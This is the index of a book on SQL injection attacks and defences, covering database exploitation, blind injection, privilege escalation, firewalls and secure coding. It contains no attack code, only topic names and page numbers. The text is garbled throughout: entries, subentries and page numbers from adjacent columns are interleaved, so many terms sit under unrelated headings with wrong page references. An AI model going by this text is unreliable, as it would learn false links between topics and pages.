542 Index database configuration information and custom application code, 329–330 schema, 508 DBMS_SCHEDULER, 326–327 EXTPROC, 325–326 database server attacking Java, 326 cracking database passwords, 510 PL/SQL native, 327–328 database directly attacking, 510–511 PL/SQL native 9i, 329 file read, 511 privilege escalation, 322–325 file write, 511 SYSDBA privileges, 330 system command execution, 509–510 text, 328–329 out-of-band communication, 214–215 O password hashes, 207–211 PL/SQL code, 200–201 open Web application security project privilege types, 185–186 (OWASP), 405 reading files access files, 304 Operating system exploitation Java, 304–306 consolidating access, 333–335 select statements, 305 database programmers, 289 utl_ file_dir database, 304, 306 executing commands response-based techniques, 263–264 Microsoft SQL Server, 318–322 SYS.DBMS_CDC_PUBLISH, 202 MySQL, 318 SYS.LT, 201–202 Oracle, 322–330 transaction log, 465–466 PostgreSQL, 330–333 writing files file system accessing binary code, 315 reading files, 290–306 DBMS_ADVISOR, 315 writing files, 306–317 Java, 315–316 methods, 315 Oracle Oracle cheat sheet columns and data type, 185 blind SQL injection functions, components APEX, 209 511, 513 Oracle internet directory (OID), 209–211 database configuration information and schema, concept, 201 data encryption standard (DES) password 511–513 hashes, 207 database server attacking database dbms_assert, 390 command execution, 513–514 O’Boyle, 389 cracking database passwords, 516–517 preceding functions, 390 PL/SQL reading local files, 514–515 quote character, 390 PL/SQL writing local files, 515–516 database schema enumeration, 184–188 reading local files, 514 database server, 214 Oracle PL/SQL and Microsoft Transact-SQL DBA privileges, 201 delays in database queries, 257 (T-SQL) code E-mail system, 214–215 authid clause, 118–119 encoding output, database, 388–395 built-in database, 118–119 escalating privileges, 200–202 data definition language (DDL) statements, execution plan, database, 459 file system, 219 119–120 mixed-case characters, 207 database administrators (DBAs), 121 multiple databases, 184 EXEC( ), 123 object timestamps, database, 469–470 EXECUTE function, 121–122 operating system commands information_schema database, 126 alter system, 329 LIKE statement, 120 buffer overflow, 329 sp_helptext, 123 code execution via direct access, 325–330 SQL Server 2008 database, 125 stored procedures, 123–125 user-controlled data, 121

Index 543 P web application firewall (WAF), 411–417 generic attacks rule file, 413 parameterized statement ModSecurity, 411–417 .NET (C#) SecRule, generic syntax, 411–412 ADO.NET framework, 373–374 OleDbClient, 375 PostgreSQL HTML5 browser storage administrative privileges, 206 Web SQL Database specification, 378 database Web Storage Specification, 379 pq_escape_string( ), 394 Java string terminator, 394 hibernate, 373 database schema enumeration, 183–184 JDBC framework, 372 delays in database queries, 252–254 mobile apps encoding output, database, 394–395 Android applications, 378 execution plan, database, 460–461 iOS applications, 377–378 hierarchical approach, 183 PHP ILIKE clause, 184 data objects, 376 MD5, 207 PDO package, 376–377 object timestamps, database, 471–472 PL/SQL, 377 operating system commands, 330–333 password hashes, 206–207 pattern-matching filters, 340–341 reading files payment card industry data security standards COPY function, 306 ‘/etc/passwd’ file, 306 (PCI-DSS), 402–403 response-based techniques, 260–261 PHP applications transaction log, 468 writing files $input variable, 108, 109 COPY function, 316 $sql variable, 107 PHP programing language, 316 awk function, 105 sqlmap supports, 317 grep strings, 106 super user privileges, 316 mssql_execute( ) and odbc_prepare( ), PostgreSQL cheat sheet 105–106 blind SQL injection functions, 518 user-controlled data, 108, 109 database configuration information and platform-level defenses schema, 517–518 Application Intrusion Detection Systems (IDSs), database server attacking cracking database passwords, 424–425 519–520 Aspect-oriented Programming (AOP), 424 local file access, 519 database firewall, 425 system command execution, 519 intercepting filters R application filters, 420–421 filter pattern, scripted languages, Relational database management system (RDBMS), 297 421–422 filtering web service messages, 422 response-based techniques web server and application filters, MySQL FALSE inference, 259 417–420 TRUE inference, 259 non-editable versus editable input Web application, 259 one bit information protection, 422 binary search method, 266–267 runtime protection technologies and techniques CASE statement, 265–266 Oracle code changes, 410 CAST( ), 264 Commercial off-the-shelf (COTS) key bits, 263 applications, 410 URL/page-level strategies HTTP Handler configuration, 423 page overriding, 423 resource proxying/wrapping, 424 substitute servlet configuration, 423 URL rewriting, 423–424

544 Index PostgreSQL Java application, 102 error management, 261 java.sql, 102 PAUSE( ) function, 261 PHP scripting language, 99–102 vulnerable applications, 99 SQL Server data process ASP.NET, 262–263 C#, 110–111 CASE statement, 263 grep tool, 104 integrated development environment (IDE), 104 reviewing source code Java, 109–110 $param, 90–91 PHP, 104–111 Android application code dynamic code analysis, 89–90 Content-Providers, 111–112, 115, 116 methodical approach, 90 SQLiteDatabase, 112–114 methods, 89–90 SQLiteQueryBuilder, 112–114 PHP code, 90–91 sqlmap, 112–114 PL/SQL and T-SQL code WebContentResolver, 112 authid clause, 118–119 automated tools built-in database, 118–119 abstract syntax tree (AST), 127 data definition language (DDL) AppCodeScan, 130 AppScan Source Edition, 135 statements, 119–120 CodePro AnalytiX, 132 database administrators (DBAs), 121 CodeSecure, 135 EXEC( ), 123 command-line utilities, 126–127 EXECUTE function, 121–122 control fl ow graph (CFG), 127 information_schema database, 126 Klocwork Solo, 135–136 LIKE statement, 120 lexical analysis, 127 sp_helptext, 123 Microsoft analyzer, 131 SQL Server 2008 database, 125 Microsoft code analysis tool .NET stored procedures, 123–125 (CAT.NET), 131–132 user-controlled data, 121 mysql_query( ) function, 127 security-sensitive function, 90 OWASP LAPSE+ project, 130–131 sinks, 92 PHP scripts, vulnerabilities in, 132 static code analysis, 89–90 Pixy, 129–130 user-controlled data, 91 RIPS, 132 ROLE privileges, 185–187 source code analyzers (SCAs), 133–134 static analysis, 134–135 S Teachable Static Analysis Workbench (TeSA), 132–133 sanitizing filters, 345, 346 yet another source code analyzer SAP MAX DB (SAP DB), 15 (YASCA), 129 second-order SQL injection coding behavior recognition build and execute statements, 92–93 address book application, 350–352 C# applications, 98–99 bugs, 354 dynamic string-building techniques, 92 HTTP request and response, 350 EXECUTE function, 93, 94 second-order vulnerabilities, 352–355 HTML form, 95 Secure sockets layer (SSL), 437 HTTP headers, 95 simple mail transfer protocol (SMTP), 273 Java application, 97–98 simple object access protocol (SOAP), 334–335 METHOD attribute, 95 SQL injection flaws, 12 Oracle stored procedures, 94 SQL injection vulnerabilities PHP function and code, 96 CMS application, 7–8 string concatenation, 92 dynamic string building user-controlled input, 94–95 dangerous functions built-in command, 16 C#, 103–104 error handling, 18–19 escape characters handling, 14–15

Index 545 handling types, 15–17 response-based techniques, 261–263 idiosyncrasies of, 15 server file system, 216 multiple submissions handling, 19–21 sp_addsrvrolemember procedure, 195 parameterized queries, 13–14 sysxlogins table, 205 PHP code, 14 UNION SELECT, 177 query assembly handling, 17–18 unpatched servers, 199–200 string-building techniques, 13–14 WAITFOR DELAY, 197 e-commerce application, 2, 6 sqlmap GET versus POST parameters, 7 command-line automation, 224 high-profile Web sites par excellence, 224 Common Vulnerabilities and Exposures Python, 224–225 squeeza, 284–286 (CVE), 9–10 SSL. See Secure sockets layer (SSL) hacking Web applications, 11–12 structured query language (SQL) primer malicious script, 12 bypassing input validation filters script kiddies, 12 HTTP-delivered enterprise applications, 6 HTTP encoding, 521, 522 insecure database configuration quote filters, 520–521 built-in stored procedures, 21 DB2 cheat sheet commands, 22 blind SQL injection functions, 526, 527 database administrator (DBA) privileges, 22–23 database configuration information and database metadata, 22 Oracle, 22–23 schema, 526 SYSTEM privileges, 21 Informix cheat sheet login.php script, 8 MySQL database, 23 blind SQL injection functions, 527–528 parsing and execution, 6 database configuration information and programming languages, 13 Web applications works schema, 527 database-driven, 2 Ingres cheat sheet four-tier architecture, 5–6 PHP script, 3 blind SQL injection functions, 528–529 three-tier architecture, 4–5 database configuration information and SQL Server brute-force mode, 197 schema, 528, 529 columns, 176 injection database schema enumeration, 175–178 database table extraction, 218 combine multiple rows and columns, 499 delays in database queries, 254–257 database platform identification, e-commerce application, 175 e-shop database, 176 495–497 escalating privileges, 194–200 vulnerabilities, 492–495 file system materials resources –U and–P parameters, 218 cheat sheets, 531 bcp.exe, 217 exploit tools, 531–532 password hash, 216–217 password cracking tools, 532 queryout parameter, 217 white papers, 531 sql_logins table, 216 Microsoft SQL server cheat sheet fn_varbintohexstr( ), 205 blind SQL injection functions, 504 OPENROWSET command, 194–195 database configuration information and out-of-band communication, 216–218 password hashes, 204–206 schema, 500–504 pwdencrypt( ), 204 database server attacking, 506–508 remote database server, 175 microsoft SQL server privilege escalation, 504–506 OPENROWSET reauthentication attack, 505–506 MySQL cheat sheet blind SQL injection functions, 508 database configuration information and schema, 508 database server attacking, 508–511

546 Index Oracle cheat sheet SQLiX, 82–83 blind SQL injection functions, tasks, 76 511, 513 Zed Attack Proxy, 83–85 database configuration information and blind injection detection, 54–58 schema, 511–513 confirming and terminating database server attacking, 511–517 back-end server, 70 BENCHMARK function, 75 PostgreSQL cheat sheet database comment syntax, 65–67 blind SQL injection functions, 518 database concatenation operators, database configuration information and schema, 517–518 69, 70 database server attacking, 518–520 DBMS_LOCK.SLEEP( ) function, 76 executing multiple statement, 70–74 SQL queries exploitation, 68 ALTER TABLE statement, 490 inline function, 59–65 CREATE TABLE statement, 488–490 multiline comments, 68, 69 DELETE statement, 488 numbers and strings, 58–59 DROP statement, 488 statement, 65 GROUP BY statement, 490 testing string, 70 INSERT statement, 487–488 time delays, 74–76 ORDER BY clause, 490–491 trial-and-error process, 58 result set limitation, 491–492 Victim Inc, 67 SELECT statement, 486–487 database errors UNION operator, 487 Microsoft SQL Server, 38–42 UPDATE statement, 488 MySQL, 42–45 Oracle, 45–47 Sybase cheat sheet PostgreSQL, 47–49 blind SQL injection functions, 530 triggers, 37 database configuration information GET requests, 29 and schema, 529–530 information workflow, 35 injectable data, 31–32 troubleshooting SQL injection attacks, manipulating parameters, 32–35 521–525 POST requests, 29–31 Trigger anomalies, 28 SUBSTRING( ) function, 242–243 three-tier architecture, 4–5 Sybase cheat sheet tiered architecture, basic concept of, 5–6 time-based techniques blind SQL injection functions, 530 database queries database configuration information and methods, 249 MySQL delays, 250–252 schema, 529–530 Oracle delays, 257 SYSTEM privileges, 185–187 PostgreSQL delays, 252–254 SQL Server delays, 254–257 T inference considerations, 257–258 transaction log TABLE privileges, 185–187 analysis, 463–468 TCP. See transmission control protocol (TCP) Microsoft SQL Server, 463–465 testing and inference MySQL, 466–468 Oracle, 465–466 application response PostgreSQL, 468 back-end database, 49 transmission control protocol (TCP), 267, different inputs, 53–54 generic errors, 49–52 296–297 HTTP code errors, 52–53 troubleshooting SQL injection attacks, automating discovery 521–525 database error, 76 GET and POST requests, 76 HP Scrawlr,80–82 HP WebInspect, 77–79 IBM Rational AppScan, 79–80 Paros Proxy, 83–85

Index 547 U Web applications content management system (CMS), 8 UNION statements CVE requests, 9–10 data types database-driven, 2 back-end database, 156 e-commerce application, 2 brute-force guessing, 153–154 four-tier architecture, 5–6 cast operators, 156 hybrid attacks integer and string, 154 creating cross-site scripting (XSS), 358–359 looping statement, 158 exploiting authenticated vulnerabilities, multiple data, 155 360–361 NULL clause, 153 leveraging captured data, 358 SELECT queries, 156 operating system commands, Oracle, system_user and db_name( ), 155 359–360 WHERE clause, 157 input filters matching columns bypassing custom filters, 347–348 database server technology, 151 case variation, 340 ORDER BY clause, 152–153 comments, 340–341 products.asp, 152 dynamic query execution, 342–345 requirements, 151 non-standard entry points, 348–350 syntax, 150–151 null bytes, 345 search Query referers, 349 universal naming convention (UNC), 296 SQL injection attacks, 340 user datagram protocol (UDP), 312 stripped expressions, 345–346 user-defined function (UDF), 310, 330 truncation, 346–347 userid, 8 Unicode encodings, 343 URL encoding, 341–342 V OWASP lists injection, 9–10 PHP script, 3 virtual private database (VPD), 404 programming languages, 13 RDBMS, 19 W three-tier architecture, 3–5 Web application firewalls (WAF), 339–340 Web environment, 27–28 HTTP/HTTPS, 411 Web infrastructure configuration, 439–440 ModSecurity Web server and application filters, 417–420 configurable rule set, 411–414 Web Services Description Language generic attacks rule file, 413 intrusion detection capabilities, 416–417 (WSDL), 438 request normalization, 415–416 REQUEST variables and coverage, X 414–415 response analysis, 416 XSS. See cross-site scripting (XSS) SecRule, generic syntax, 411–412 SQL errors leakage rule, 416 Z transformation functions, 415 Whitelist rule, 414 Zone-H, 10